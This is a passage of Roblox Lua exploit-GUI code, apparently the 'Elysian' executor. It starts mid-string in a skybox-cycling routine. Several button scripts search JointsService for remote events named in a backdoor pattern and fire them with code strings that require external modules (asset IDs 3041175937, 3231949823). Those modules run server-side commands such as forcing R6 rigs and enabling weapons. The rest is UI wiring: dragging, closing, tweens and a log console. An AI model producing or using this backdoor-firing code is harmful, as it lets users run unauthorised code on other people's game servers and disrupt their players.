wait(0.15)Sky.SkyboxBk=imageFour Sky.SkyboxDn=imageFour Sky.SkyboxFt=imageFour Sky.SkyboxLf=imageFour Sky.SkyboxRt=imageFour Sky.SkyboxUp=imageFour wait(0.15)Sky.SkyboxBk=imageFive Sky.SkyboxDn=imageFive Sky.SkyboxFt=imageFive Sky.SkyboxLf=imageFive Sky.SkyboxRt=imageFive Sky.SkyboxUp=imageFive wait(0.15)Sky.SkyboxBk=imageSix Sky.SkyboxDn=imageSix Sky.SkyboxFt=imageSix Sky.SkyboxLf=imageSix Sky.SkyboxRt=imageSix Sky.SkyboxUp=imageSix wait(0.15)Sky.SkyboxBk=imageSeven Sky.SkyboxDn=imageSeven Sky.SkyboxFt=imageSeven Sky.SkyboxLf=imageSeven Sky.SkyboxRt=imageSeven Sky.SkyboxUp=imageSeven wait(0.15)Sky.SkyboxBk=imageEight Sky.SkyboxDn=imageEight Sky.SkyboxFt=imageEight Sky.SkyboxLf=imageEight Sky.SkyboxRt=imageEight Sky.SkyboxUp=imageEight wait(0.15)end]])
			end
		end
	end)
end
coroutine.wrap(CHVV_fake_script)()
local function YPVOW_fake_script() -- opguns.gunS 
	local script = Instance.new('LocalScript', opguns)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(3041175937):r6("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
			wait(3)
			if v.Name:match("%^\\") then
				v:FireServer([[require(3231949823).enableWeapons("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(YPVOW_fake_script)()
local function APEUZQO_fake_script() -- r6.r6s 
	local script = Instance.new('LocalScript', r6)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(3041175937):r6("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(APEUZQO_fake_script)()
local function KOWOW_fake_script() -- credits.credits 
	local script = Instance.new('Script', credits)

	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.Parent.creditsXD.Visible == false then
			script.Parent.Parent.Parent.creditsXD.Visible = true
		else script.Parent.Parent.Parent.creditsXD.Visible = false
		end
	end)
end
coroutine.wrap(KOWOW_fake_script)()
local function KWYIZKZ_fake_script() -- console.consolescript 
	local script = Instance.new('LocalScript', console)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.elysianconsole.Visible = true
	end)
end
coroutine.wrap(KWYIZKZ_fake_script)()
local function EHAL_fake_script() -- Frame.drag 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Draggable = true
end
coroutine.wrap(EHAL_fake_script)()
local function HTYDAD_fake_script() -- exit.excrip 
	local script = Instance.new('Script', exit)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent:Destroy()
	end)
end
coroutine.wrap(HTYDAD_fake_script)()
local function URVCXYP_fake_script() -- attach.IntroTween 
	local script = Instance.new('LocalScript', attach)

	script.Parent.MouseButton1Click:Connect(function()
	local img = script.Parent.Parent.Parent.Parent.ImageLabel
	local TweenService = game:GetService("TweenService")
	local txt = img.TextLabel
	local btn = img.fr6
		wait(1)
		local Output = script.Parent.Parent.Parent.output
	
		local ElysianUser = game:GetService("Players").LocalPlayer.Name
		Output.Text = (Output.Text.."\n".." Initiating...")
		wait(0.3)
		Output.Text = (Output.Text.."\n".." Scanning...")
		Output.Text = (Output.Text.." OK")
	img:TweenPosition(UDim2.new(0.458, 0, 0.408, 0), "Out", "Linear", 0.4, false)
		wait(3)
		Output.Text = (Output.Text.."\n".." Done!")
	img:TweenPosition(UDim2.new(0.01, 0, 0.813, 0), "Out", "Sine", 0.7, false)
	wait(1)
	Output.Text = (Output.Text.."\n".." Welcome, "..ElysianUser)
	TweenService:Create(txt, TweenInfo.new(1, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {["BackgroundTransparency"] = 0}):Play()
	TweenService:Create(txt, TweenInfo.new(1, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {["TextTransparency"] = 0}):Play()
	
	for i,v in pairs(game.Players:GetPlayers()) do
		if v.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then -- R6 detection
			btn.BackgroundTransparency = 1
			btn.TextTransparency = 1
		elseif v.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then -- R15 detection
			TweenService:Create(btn, TweenInfo.new(1, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {["BackgroundTransparency"] = 0}):Play()
			TweenService:Create(btn, TweenInfo.new(1, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {["TextTransparency"] = 0}):Play()
		end
	end
	wait(2)
	while wait() do
	for i,v in pairs(game.Players:GetPlayers()) do
		if v.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
	btn.Transparency = 1
	elseif v.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
	btn.Transparency = 0
	end
	end
	end
	end)
end
coroutine.wrap(URVCXYP_fake_script)()
local function SXSSMM_fake_script() -- creditsXD.loldrag 
	local script = Instance.new('LocalScript', creditsXD)

	script.Parent.Draggable = true
end
coroutine.wrap(SXSSMM_fake_script)()
local function PNXGU_fake_script() -- fr6.1526 
	local script = Instance.new('LocalScript', fr6)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(3041175937):r6("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(PNXGU_fake_script)()
local function LPESJ_fake_script() -- CloseButton.CloseScript 
	local script = Instance.new('LocalScript', CloseButton)

	local frame = script.Parent.Parent
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(LPESJ_fake_script)()
local function COEZ_fake_script() -- elysianconsole.DraggableScript 
	local script = Instance.new('LocalScript', elysianconsole)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(COEZ_fake_script)()
local function XMMYYGF_fake_script() -- OpenOutputVariableTextButton.LocalScript 
	local script = Instance.new('LocalScript', OpenOutputVariableTextButton)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.OutputFrame.Visible = true
	end)
end
coroutine.wrap(XMMYYGF_fake_script)()
local function DBXST_fake_script() -- OutputFrame.outputUpdate 
	local script = Instance.new('Script', OutputFrame)

	local colors = {
		[Enum.MessageType.MessageOutput] = BrickColor.new("White").Color;
		[Enum.MessageType.MessageInfo] = BrickColor.new("Bright blue").Color;
		[Enum.MessageType.MessageWarning] =	BrickColor.new("Bright yellow").Color;
		[Enum.MessageType.MessageError]	 = BrickColor.new("Bright red").Color;
	}
	local canvasX = 0
	
	game:getService("LogService").MessageOut:connect(function(output, messageType)
		local newLine = script.Parent.blankLine:clone()
		newLine.TextColor3 = colors[messageType]
		newLine.Position = UDim2.new(0, 5, 0, (#script.Parent.scroll:getChildren() * 15))
		newLine.Text = output
		newLine.Name = tick()
		newLine.Parent = script.Parent.scroll
		newLine.Size = UDim2.new(0, (#output * 10), 0, 15)
		canvasX = (canvasX > (#output * 10) and canvasX or (#output * 10)) --dont use newLine.TextBounds.X outside of a local script
		script.Parent.scroll.CanvasSize = UDim2.new(0, (canvasX + 10), 0, ((#script.Parent.scroll:getChildren() + 1) * 15))
	end)
	
end
coroutine.wrap(DBXST_fake_script)()